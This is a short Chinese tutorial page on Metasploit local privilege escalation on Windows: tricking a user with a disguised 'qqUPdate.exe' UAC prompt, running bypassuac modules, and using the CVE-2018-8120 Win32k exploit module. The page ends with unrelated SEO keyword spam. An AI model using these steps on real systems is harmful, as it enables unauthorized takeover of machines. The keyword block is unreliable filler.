千家信息网

内网渗透之如何理解msf本地提权

发表于:2025-11-10 作者:千家信息网编辑
千家信息网最后更新 2025年11月10日,本篇内容介绍了"内网渗透之如何理解msf本地提权"的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!msf
千家信息网最后更新 2025年11月10日内网渗透之如何理解msf本地提权

本篇内容介绍了"内网渗透之如何理解msf本地提权"的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!

msf本地提权

1. 利用uac提权

前提与目标机建立会话连接

  1. seach local/ask 搜索关键字local/ask

  2. use 0 进入到exploit/windows/local/ask模块下

  3. show options 查看相关参数

  4. set FILENAME qqUPdate.exe 设置文件名qqUPdate.exe(具有迷惑性的名字都可以)

  5. set session 1 设置会话窗口(先查看一下会话的id)

  6. run执行

  7. 目标机弹出弹窗

  8. 点击是后,成功进入meterpreter命令行

  9. 这时候getsystem就可以成功提权

2. 绕过uac认证

  1. search bypassuac 搜索bypassuac关键字(显示有13个提取脚本,一个不行就换一个)

  2. use 3 进入编号为3的提权脚本模块

  3. show opthions 查看相关参数

  4. 查看会话并且设置会话

  5. show targets 显示可选平台

  6. set target 0 设置为X86

  7. run 执行

  8. 提权成功

3. 利用windows本地提权漏洞进行提权

  1. cve-2018-8120 Win32k权限提升漏洞],影响范围(Windows 7 SP1/2008 SP2,2008 R2 SP1)

  2. search cve-2018-8120 查找关键字

  3. use 0 进入该模块

  4. show options 查看相关参数

  5. session 查看会话

  6. 设置为没有权限的会话3

  7. 进入后直接获得管理员权限

"内网渗透之如何理解msf本地提权"的内容就介绍到这里了,感谢大家的阅读。如果想了解更多行业相关的知识可以关注网站,小编将为大家输出更多高质量的实用文章!

成功 关键 关键字 参数 权限 模块 内容 更多 漏洞 目标 知识 脚本 搜索 不行 实用 学有所成 接下来 前提 名字 命令 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 无锡服务器租用 数据库哪个专业比较好 我的世界怎么设置永恒服务器 服务器处理器发布会 多个小程序用一个服务器 萌小明网络技术有限公司 前端项目部署到服务器上 装两个sql数据库吗 启东无忧网络技术诚信经营 gom引擎物品数据库加载不了 学习网络安全专业应该考哪些证 送外卖哪家服务器好 黑龙江公安厅网络安全总队 分子生物学上的go数据库 如何在数据库中看到关系模式 不同数据库无法联网 北京天梯网络技术有限公司 为什么同花顺总是在切换服务器 网络rtk与服务器断开连接 网络安全与执法专业科目 考研网络安全报考哪些专业 景安免费服务器 计算机网络安全期刊论文 求生之路第三方服务器怎么玩 软件开发方向好找工作吗 删除的sql数据库怎么恢复 免费电子数据库名单 分子生物学上的go数据库 湖州乐游网络技术有限公司 网络安全法 应急响应
0